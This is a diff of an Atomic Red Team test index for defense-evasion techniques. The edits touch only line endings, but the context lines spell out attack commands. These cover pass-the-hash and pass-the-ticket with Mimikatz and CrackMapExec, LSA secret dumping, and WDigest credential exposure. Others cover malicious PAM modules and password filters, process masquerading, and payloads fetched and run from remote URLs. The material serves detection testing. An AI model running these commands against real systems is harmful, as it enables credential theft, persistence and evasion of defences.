@@ -29997,7 +29997,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -30013,14 +30013,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -30036,14 +30036,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -30059,14 +30059,14 @@ defense-evasion: executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -30082,14 +30082,14 @@ defense-evasion: executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. - ' +' supported_platforms: - macos - linux 
@@ -30109,14 +30109,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. - ' +' supported_platforms: - macos - linux @@ -30136,13 +30136,13 @@ defense-evasion: executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. - ' +' supported_platforms: - macos - linux @@ -30158,13 +30158,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. - ' +' supported_platforms: - macos - linux @@ -30180,7 +30180,7 @@ defense-evasion: executor: command: 'chown -R #{owner} #{file_or_folder} - ' +' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f @@ -30198,7 +30198,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} - ' +' name: sh T1078.003: technique: @@ -30322,7 +30322,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. - ' +' supported_platforms: - windows input_arguments: 
@@ -30342,10 +30342,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) - ' +' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#(unknown)" @@ -30358,7 +30358,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. - ' +' supported_platforms: - windows input_arguments: @@ -30378,10 +30378,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) - ' +' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#(unknown)" @@ -30504,7 +30504,7 @@ defense-evasion: Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ - ' +' supported_platforms: - windows input_arguments: 
@@ -30516,20 +30516,20 @@ defense-evasion: dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) - ' +' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" - ' +' cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null - ' +' name: powershell - name: Mount an ISO image and run executable from the ISO auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc @@ -30551,10 +30551,10 @@ defense-evasion: dependencies: - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) - ' +' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" @@ -30588,18 +30588,18 @@ defense-evasion: - description: A test file with the Zone.Identifier attribute must be present. prereq_command: 'if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 } - ' +' get_prereq_command: | Invoke-WebRequest #{file_to_download} -OutFile #{file_path} Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3' executor: command: 'Unblock-File -Path #{file_path} - ' +' cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value ''[ZoneTransfer]'',''ZoneId=3'' - ' +' name: powershell T1036.004: technique: 
@@ -30675,7 +30675,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f - ' +' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc @@ -30690,7 +30690,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times - ' +' name: command_prompt elevation_required: true T1036: @@ -30840,7 +30840,7 @@ defense-evasion: description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) - ' +' supported_platforms: - macos - linux @@ -31089,11 +31089,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f - ' +' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Modify Registry of Local Machine - cmd @@ -31113,11 +31113,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f - ' +' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials @@ -31132,11 +31132,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f - ' +' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone 
@@ -31177,11 +31177,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "''" - ' +' name: command_prompt T1218.007: technique: @@ -31683,7 +31683,7 @@ defense-evasion: description: 'Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. - ' +' supported_platforms: - windows input_arguments: @@ -31695,17 +31695,17 @@ defense-evasion: dependencies: - description: 'T1218.msi must exist on disk at specified location (#{msi_payload}) - ' +' prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own MSI" - ' +' executor: command: 'msiexec.exe /q /i "#{msi_payload}" - ' +' name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 @@ -31713,7 +31713,7 @@ defense-evasion: in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. - ' +' supported_platforms: - windows input_arguments: @@ -31724,7 +31724,7 @@ defense-evasion: executor: command: 'msiexec.exe /q /i "#{msi_payload}" - ' +' name: command_prompt - name: Msiexec.exe - Execute Arbitrary DLL auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec @@ -31743,17 +31743,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'msiexec.exe /y "#{dll_payload}" - ' +' name: command_prompt T1564.004: technique: 
@@ -31893,7 +31893,7 @@ defense-evasion: Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore - ' +' name: powershell - name: Create ADS command prompt auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb @@ -31917,7 +31917,7 @@ defense-evasion: for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' name: command_prompt - name: Create ADS PowerShell auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 @@ -31939,13 +31939,13 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'New-Item -Path #{file_name} | Out-Null - ' +' executor: command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" @@ -31953,7 +31953,7 @@ defense-evasion: set-content -path . -stream #{ads_filename} -value "test3" cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' name: powershell T1599.001: technique: @@ -32162,7 +32162,7 @@ defense-evasion: auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 description: 'Add a Network Share utilizing the command_prompt - ' +' supported_platforms: - windows input_arguments: @@ -32179,7 +32179,7 @@ defense-evasion: auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222' description: 'Removes a Network Share utilizing the command_prompt - ' +' supported_platforms: - windows input_arguments: 
@@ -32190,13 +32190,13 @@ defense-evasion: executor: command: 'net share #{share_name} /delete - ' +' name: command_prompt - name: Remove Network Share PowerShell auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 description: 'Removes a Network Share utilizing PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -32443,14 +32443,14 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} - ' +' name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: 'Mimic execution of compressed executable. When successfully executed, calculator.exe will open. - ' +' supported_platforms: - windows input_arguments: @@ -32462,11 +32462,11 @@ defense-evasion: dependencies: - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe - ' +' prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" @@ -32474,7 +32474,7 @@ defense-evasion: executor: command: '"%temp%\temp_T1027.zip\T1027.exe" - ' +' cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul @@ -32508,7 +32508,7 @@ defense-evasion: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' -Attachments #{input_file} -SmtpServer #{smtp_server} - ' +' name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 @@ -32529,7 +32529,7 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} - ' +' name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f 
@@ -32537,7 +32537,7 @@ defense-evasion: "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows executor: @@ -32548,7 +32548,7 @@ defense-evasion: 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) - ' +' name: powershell - name: Obfuscated Command Line using special Unicode characters auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f @@ -32646,7 +32646,7 @@ defense-evasion: auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 description: 'Execute arbitrary DLL file stored locally. - ' +' supported_platforms: - windows input_arguments: @@ -32658,17 +32658,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} - ' +' name: command_prompt T1134.004: technique: @@ -32781,10 +32781,10 @@ defense-evasion: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - ' +' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" 
@@ -32825,7 +32825,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -32854,7 +32854,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -32884,7 +32884,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -32920,7 +32920,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -33005,7 +33005,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -33020,13 +33020,13 @@ defense-evasion: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" - ' +' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec - ' +' supported_platforms: - windows input_arguments: 
@@ -33055,14 +33055,14 @@ defense-evasion: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) - ' +' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} - ' +' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -33143,7 +33143,7 @@ defense-evasion: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos - ' +' supported_platforms: - windows input_arguments: @@ -33151,7 +33151,7 @@ defense-evasion: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -33160,10 +33160,10 @@ defense-evasion: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -33174,7 +33174,7 @@ defense-evasion: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" - ' +' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb 
@@ -33217,19 +33217,19 @@ defense-evasion: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) - ' +' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} - ' +' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -33312,7 +33312,7 @@ defense-evasion: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -33325,14 +33325,14 @@ defense-evasion: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -33754,10 +33754,10 @@ defense-evasion: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -33791,35 +33791,35 @@ defense-evasion: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1205.001: technique: external_references: @@ -34256,13 +34256,13 @@ defense-evasion: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - ' +' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process - ' +' supported_platforms: - windows input_arguments: @@ -34274,7 +34274,7 @@ defense-evasion: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -34285,7 +34285,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" 
@@ -34408,7 +34408,7 @@ defense-evasion: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -34419,7 +34419,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -34454,7 +34454,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -34469,10 +34469,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -34483,7 +34483,7 @@ defense-evasion: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" - ' +' name: command_prompt elevation_required: false T1055.008: @@ -34618,7 +34618,7 @@ defense-evasion: description: 'Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. - ' +' supported_platforms: - windows input_arguments: @@ -34630,7 +34630,7 @@ defense-evasion: command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" - ' +' name: command_prompt T1542.004: technique: 
@@ -34853,7 +34853,7 @@ defense-evasion: description: 'Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn''t really execute either." will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -34870,10 +34870,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) - ' +' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34883,7 +34883,7 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' name: command_prompt - name: Regsvcs Uninstall Method Call Test auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 @@ -34906,10 +34906,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) - ' +' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34998,7 +34998,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: 
@@ -35018,10 +35018,10 @@ defense-evasion: dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#(unknown)) - ' +' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#(unknown)" @@ -35056,7 +35056,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -35077,10 +35077,10 @@ defense-evasion: - description: 'AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) - ' +' prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" @@ -35088,14 +35088,14 @@ defense-evasion: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) - ' +' name: command_prompt - name: Regsvr32 Registering Non DLL auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 description: 'Replicating observed Gozi maldoc behavior registering a dll with an altered extension - ' +' supported_platforms: - windows input_arguments: @@ -35115,13 +35115,13 @@ defense-evasion: dependencies: - description: 'Test requires a renamed dll file - ' +' prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 ) - ' +' get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}" - ' +' executor: name: command_prompt elevation_required: false 
@@ -35237,7 +35237,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading as Linux crond process. auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 @@ -35253,7 +35253,7 @@ defense-evasion: echo 'sleep 5' | /tmp/crond cleanup_command: 'rm /tmp/crond - ' +' name: sh - name: Masquerading - cscript.exe running as notepad.exe auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 @@ -35269,7 +35269,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - wscript.exe running as svchost.exe auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 @@ -35285,7 +35285,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - powershell.exe running as taskhostw.exe auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa @@ -35301,7 +35301,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - non-windows exe running as windows exe auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 @@ -35324,10 +35324,10 @@ defense-evasion: dependencies: - description: 'Exe file to copy must exist on disk at specified location (#{inputfile}) - ' +' prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}" 
